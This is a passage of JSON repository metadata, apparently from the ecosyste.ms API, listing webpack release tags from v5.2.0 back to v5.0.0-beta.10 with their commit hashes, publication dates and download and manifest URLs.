ack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"